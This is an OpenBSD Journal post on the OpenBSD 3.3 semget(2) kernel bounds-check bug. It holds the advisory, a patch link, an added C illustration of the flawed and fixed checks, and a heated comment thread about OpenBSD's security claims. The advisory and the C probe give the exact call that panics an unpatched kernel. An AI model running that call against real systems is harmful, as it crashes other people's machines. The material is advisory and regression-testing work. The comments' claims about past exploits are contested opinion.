OpenBSD Journal

patch_02: OpenBSD 3.3: improper kernel bounds check

Contributed by jose on from the kernel-bugs dept.

jules writes: " An improper bounds check in the semget(2) system call can allow a local user to cause a kernel panic. No privilege escalation is possible; the attack simply runs the kernel out of memory. The bug was introduced in OpenBSD 3.3; previous versions of OpenBSD are unaffected.

The bug has been fixed in OpenBSD-current as well as the 3.3 stable branch. In addition, a patch is available for OpenBSD 3.3:
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.3/common/002_semget.patch

Credit goes to blexim for finding and reporting the problem.

Start playing with semget(IPC_PRIVATE, -1, 0) :("

Bummer, well, time to upgrade. Thanks go to Todd Miller for the Security-Announce mail.
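To make the shape of the bug concrete, here is an added example in C, written for this page. It is not the OpenBSD kernel's code, not the 002_semget.patch, and not part of jules's post. It models a semaphore-count check that tests only the upper bound beside the corrected check, and includes a probe that issues the exact call from the post. The limit SEMMSL_MAX, the record size SEM_RECORD and every function name are assumptions made for illustration. The probe is a post-patch check: on an unpatched 3.3 kernel it does precisely what the advisory warns about, so do not run it on a box you have not updated.

```c
/*
 * Added illustration, not code from the advisory, the patch or the OpenBSD
 * kernel. It models the bug class described above: a semget(2)-style
 * semaphore-count check that tests only the upper limit, so a negative
 * nsems passes and the size computation that follows wraps into a huge
 * allocation request, which per the advisory runs the kernel out of memory
 * and panics it. The limit and record size below are assumed values.
 */
#include <stddef.h>
#include <stdio.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/types.h>

#define SEMMSL_MAX 60   /* assumed per-set limit; the kernel tunable is seminfo.semmsl */
#define SEM_RECORD 16   /* assumed size in bytes of one in-kernel semaphore record */

/*
 * Bug pattern: only the upper bound is tested. Returns the number of bytes
 * that would be handed to the kernel allocator, or 0 when rejected.
 * For nsems == -1 the cast to size_t yields SIZE_MAX and the product wraps
 * to a value just below SIZE_MAX: an allocation that can never succeed.
 */
size_t semset_bytes_unchecked(int nsems)
{
    if (nsems > SEMMSL_MAX)
        return 0;
    return (size_t)nsems * SEM_RECORD;
}

/* Corrected check: reject anything outside [1, SEMMSL_MAX] before sizes are computed. */
size_t semset_bytes_checked(int nsems)
{
    if (nsems <= 0 || nsems > SEMMSL_MAX)
        return 0;
    return (size_t)nsems * SEM_RECORD;
}

/*
 * Probe for a patched kernel: the call quoted in the post is made once and
 * its outcome reported. Returns 1 if the kernel rejected it (the fixed
 * behaviour; errno is normally EINVAL), 0 if a set was actually created,
 * in which case it is removed again. On an unpatched OpenBSD 3.3 this call
 * panics the machine, so run it only on a box you are willing to lose.
 */
int probe_negative_nsems(void)
{
    int id = semget(IPC_PRIVATE, -1, 0);
    if (id == -1)
        return 1;
    semctl(id, 0, IPC_RMID);
    return 0;
}

int main(void)
{
    printf("unchecked(-1): %zu bytes requested\n", semset_bytes_unchecked(-1));
    printf("checked(-1):   %zu bytes requested (0 = rejected)\n", semset_bytes_checked(-1));
    printf("kernel probe:  %s\n", probe_negative_nsems() ? "rejected" : "accepted");
    return 0;
}
```

The two model functions show why "no privilege escalation" is the expected outcome here: the attacker controls only the size of a failed allocation, not its contents or where it lands. The probe is the one-line regression test to keep around after applying the patch; a kernel with the fix answers the call with an error instead of an allocation attempt.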



Comments
  1. By systrace () on http://cowofb0rg.org

    I checked the errata earlier this afternoon... someone mentioned something in IRC about 002 and I was confused since I didn't see it. Glad I reloaded and saw it :)

    Comments
    1. By Anonymous Coward () on

      No privilege escalation is possible, the attack simply runs the kernel out of memory.

      Yet.

      Comments
      1. By Anonymous Coward () on

        Oh, you know better then?

      2. By Anonymous Coward () on

        I think the OpenBSD team will know this just a tiny little bit better than you. No offense.
        And besides, by the time anyone would figure out a way (if at all possible), all our boxes are patched anyway, right?

        3.3 seems to be doing pretty well. Just 2 patches, and 3.4 isn't that far away anymore. 3.3 could easily become the release with the least amount of patches thus far!

        Comments
        1. By Anonymous Coward () on

          Sure, just like OpenSSH wasn't remotely exploitable.

          Comments
          1. By tedu () on

            wtf said openssh hole wasn't exploitable? the very first announcement said there was an exploit.

            Comments
            1. By Anonymous Coward () on

              Theo did, asshat. Do some reading before making antagonistic comments like this, okay?

              Comments
              1. By Anonymous Coward () on

                He didn't. If he did quote him. Now go play in your garden, and feed your trolls over there. You're useless.

                Comments
                1. By Anonymous Coward () on

                  Are you kidding? He vehemently denied it was remotely exploitable, flamed all who questioned him, only to have Gobbles prove him wrong a week later. This isn't the first time he's covered up security holes, either. Thinking that an exploit that will run the system out of memory and crash the kernel can't be locally exploitable shows your ignorance of both programming and history.

                  Comments
                  1. By earx () on

                    You are wrong!
                    What you are talking about was the Apache exploit, not OpenSSH.
                    Theo was thinking that Apache was not exploitable,
                    and they did an exploit with a local and a remote hole.

                    For OpenSSH, Theo didn't say it was not exploitable, because they gave the remote exploit before releasing the patch, with some time to fix it.
                    We just heard on day one about the exploit when Theo gave the patch.

                  2. By tedu () on

                    links?

                    Comments
                    1. By earx () on

                      The two exploits were really close together, but Theo was talking about Apache:

                      http://www.deadly.org/article.php3?sid=20020622150526

                      Comments
                      1. By Anonymous Coward () on

                        This statement should hold for ANY OpenBSD release of the past 7 years then. The statement doesn't say anything about only covering the latest release and/or the stable branch.

                        Hence if I installed OpenBSD 2.8 or even an older release and updated OpenSSH on this machine, then there shouldn't be any remote exploit on it... DON'T THINK SO!

                        http://www.deadly.org/article.php3?sid=20020622150526&mode=flat
                        This only confirms this!!!!

      3. By tedu () on

        you could try reading the code.

  2. By Me!You () on

    The intent of this post is not to start a flame. I just want to question the credibility of the OpenBSD team.

    In my opinion the claim saying: "Only one remote hole in the default install, in more than 7 years!" is not exactly true.

    Now for the proof of this:

    Revision 1.393 of index.html (Mon Dec 9 09:59:06 2002 UTC) more than 7 years

    Revision 1.392 of index.html (Mon Nov 25 22:11:52 2002 UTC) nearly 6 years

    Revision 1.379 of index.html (Sun May 19 18:51:09 2002 UTC) 5 years

    Revision 1.378 of index.html (Wed May 1 16:06:14 2002 UTC) 4 years

    Revision 1.331 of index.html (Sun Apr 29 01:25:12 2001 UTC) 3 years

    From Dec 9 2002 to Nov 25 2002 1 year?
    From Nov 25 2002 to May 19 2002 1 year?
    From May 19 2002 to May 1 2002 1 year?

    From Apr 29 2001 to Dec 9 2002 I roughly get 1 year and 7 months, which equals 4 years according to the OpenBSD team's opinion?

    Comments
    1. By Bruno Rohée () bruno@rohee.com on mailto:bruno@rohee.com

      I encourage everyone to actually see the various revisions quoted, in their entirety.

      Basically, as long as there had not been any hole, the duration increased as time went by, and once there was the only remote exploit ever, the duration was taken from the start of the project.

      Nothing to hide or to be ashamed of here.

      Comments
      1. By Me!You () on

        This claim first appeared in revision 1.284 (Thu Apr 27 07:17:21 2000) see http://www.openbsd.org/cgi-bin/cvsweb/~checkout~/www/index.html?rev=1.284&conten-type=text/plain

        It says the following:
        "Three years without a remote hole in the default install!"
        Moreover it also says the following:
        "Two years without a localhost hole in the default install!"

        Why did they only say 3 years if it is in fact more? There must have been a reason for this.

        I would have liked it if they had continued with the number of local holes as they did for a while.
        http://www.openbsd.org/cgi-bin/cvsweb/~checkout~/www/index.html?rev=1.304&content-type=text/plain

        Maybe the number got too embarrassing or they simply lost track.

        Comments
        1. By Anonymous Coward () on

          Yea, "Over 10 exploitable local kernel holes in the default install!" doesn't give the hyped-up impression they're looking for.

          Comments
          1. By Brad () on

            Where do all of you stupid asshats come from? Go slide back under your rocks and when you get a clue maybe you can come back.

            Comments
            1. By Anonymous Coward () on

              Typical reaction from the OpenBSD community when they can't defend themselves. We must defend OpenBSD at all cost. We must NOT admit faults and errors; we want the impression of the most SECURE OS at all cost. (Must hide security holes...)

              Comments
              1. By Brad () on

                Typical asshats, having to hide as an AC because you know you're wrong.

                Comments
                1. By Me!You () on

                  Typically, this gets to be a flame war. I just wanted to understand why they increased the number of years so fast. I think that it questions the credibility of the OpenBSD team.

                  But no, the only thing I get back is that I'm a flamer... thanks guys.

                  I can only conclude from this that the quote:
                  "Only one remote hole in the default install, in more than 7 years!"
                  isn't true. Otherwise you would be able to point me to some information about why it was increased so quickly.

                  Comments
                  1. By tedu () on

                    how old is the openbsd project? how many root holes in the default install in that time?

      2. Comments
        1. By Me!You () on

          Thanks!

      3. By Anonymous Coward () on

        Selective quoting at its best, indeed. I like the quote on the front page, because it's so easily misquoted by the media and idiots like yourself in OpenBSD's favor. Did we forget the Apache exploit? Did we forget the multiple locally exploitable kernel holes? I guess exploit writers don't want to take the extra hour to make their exploit mprotect the binary W|X, and include a local kernel exploit that breaks them out of that impenetrable "privilege separation", or do they?

        (10 points for the first person who ignores the entire paragraph above and chooses to comment that "OpenBSD never said privilege separation was impenetrable")

        The quote is:
        "Only one remote hole in the default install, in more than 7 years!"

        This tells us the following about OpenBSD's stance on security:
        * They don't care about local/remote DoS conditions (hence why such "reliability" fixes aren't on the security page, yet every other OS seems to consider a DoS a security-related bug)
        * They don't care about client-side bugs that can be exploited remotely (the ftp client bug for instance)
        * They don't care about bugs that don't gain you instant root (remember apache + select)
        * They don't care about exploits in programs that aren't in the default install (essentially nothing but OpenSSH)
        * They don't care about local bugs at all, since it's clearly ridiculous that anyone would want to have users on an OpenBSD server.

        You can try to deny these facts all you want, but this viewpoint trickles down to the users as is clearly evident on this website.

        Now ask yourself if you want a group of people who care about their own image more than the hyped-up security rip-offs they're dishing out to you to be in charge of your operating system.

        I'll pass.

        Comments
        1. By tedu () on

          "I guess exploit writers don't want to take the extra hour to make their exploit mprotect the binary W|X"

          how?

        2. By Anonymous Coward () on

          Hey, if you hate OpenBSD so much, why are you here? What purpose do you serve? Wouldn't your time be better spent doing something else?

    2. By Anonymous Coward () on

      What can I say.... markething bullshit!

      I want an explanation from Theo and/or other OpenBSD developers before I trust OpenBSD's repotation as the most secure operatingsystem... this is just some very good makrething bullshit!

      Why not get Theo's and other OpenBSD developers comments for once and let this flame about this claim rest. Maybe because they can't say anything except this: "Sorry guys, this OS is not as secure as we would like it to sound it is"

      Comments
      1. By Anonymous Coward () on

        you are not forced to trust openbsd. so better shut up. and btw i suggest that you better learn to spell correctly than trolling around.

        markething? makrething? repotation?

        Comments
        1. By AndrewH () on

          I think the doubters have valid questions re: the credibility of the claims put on OpenBSD. I use and have deep regard for the OS, but I refuse to be romantic or sentimental about it. How about a comment from someone inside the project?

    3. By Anonymous Coward () on

      Revision 1.1 / (download) - annotate - [select for diffs] , Wed Oct 18 08:52:43 1995 UTC (7 years, 10 months ago) by deraadt

Credits

Copyright © - Daniel Hartmeier. All rights reserved. Articles and comments are copyright their respective authors, submission implies license to publish on this web site. Contents of the archive prior to as well as images and HTML templates were copied from the fabulous original deadly.org with Jose's and Jim's kind permission. This journal runs as CGI with httpd(8) on OpenBSD, the source code is BSD licensed. undeadly \Un*dead"ly\, a. Not subject to death; immortal. [Obs.]